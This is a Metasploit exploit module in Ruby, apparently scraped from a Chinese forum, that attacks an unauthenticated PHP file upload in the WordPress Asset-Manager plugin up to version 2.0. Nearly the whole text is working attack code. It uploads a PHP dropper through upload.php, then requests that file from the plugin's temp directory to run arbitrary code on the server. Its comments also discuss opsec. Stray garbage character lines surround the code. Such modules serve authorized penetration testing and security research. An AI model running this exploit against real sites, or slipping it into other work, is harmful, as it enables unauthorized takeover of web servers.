这个 Metasploit 模块利用 WordPress Asset-Manager 插件 2.0 及以下版本中的漏洞：插件的 upload.php 在没有任何身份验证的情况下接受文件上传，攻击者可以把一个 PHP 文件上传到一个临时目录并直接访问它，从而导致远程任意代码执行。
6 L5 I$ o, e( b8 N/ u, c c# |* r
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
+ t, P o( h6 M8 J6 f " a, v7 @; S4 [ F( N/ _
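require 'msf/core'
# PhpEXE mixin: provides get_write_exec_payload, used in exploit() to wrap
# the selected payload in a self-contained PHP dropper.
require 'msf/core/exploit/php_exe'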
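class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Unauthenticated arbitrary file upload in the WordPress Asset-Manager plugin
  # (<= 2.0). The plugin's upload.php accepts a multipart POST without any
  # authentication and stores the file under wp-content/uploads/assets/temp/
  # keeping the client-supplied filename, so a .php upload is directly
  # reachable and executed by the web server.
  #
  # @param info [Hash] module metadata passed through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          # The dropper is embedded in PHP source; a NUL byte would truncate it.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Upload the PHP dropper through upload.php, then request it from the
  # plugin's temp directory to trigger execution.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the upload response does
  #   not look like a successful store, or when the trigger request returns a
  #   non-200 status.
  # TODO(review): no check() method exists; a non-intrusive probe of
  #   wp-content/plugins/asset-manager/upload.php would help operators avoid
  #   dropping a file on a host that is not running the plugin.
  def exploit
    # Build the base path on a copy rather than appending to the string
    # returned by target_uri.path in place.
    base = target_uri.path
    base = "#{base}/" unless base.end_with?('/')
    peer = "#{rhost}:#{rport}"

    # Short random name: the file lands in a web-reachable directory, so it
    # must be unguessable enough to not collide with or be reused by others.
    payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self is intended to have the PHP dropper remove itself once it
    # has run; whether any native binary written by it is also cleaned up
    # depends on PhpEXE — confirm before relying on it for opsec.
    php_payload = get_write_exec_payload(:unlink_self => true)

    mime = Rex::MIME::Message.new
    mime.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Rex::MIME::Message#to_s prefixes the first boundary with CRLF; some
    # servers reject that, so strip it.
    post_data = mime.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'data'   => post_data
    })

    # upload.php echoes the stored filename back on success; that echo is the
    # only confirmation we have that the file was written under its own name.
    if res.nil? || res.code != 200 || !res.body.to_s.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{base}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # A nil response is tolerated on purpose: a payload that holds the
    # connection (e.g. a shell) may never return an HTTP response. Only an
    # explicit non-200 status is treated as failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end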
! J/ R. |5 H; _5 T |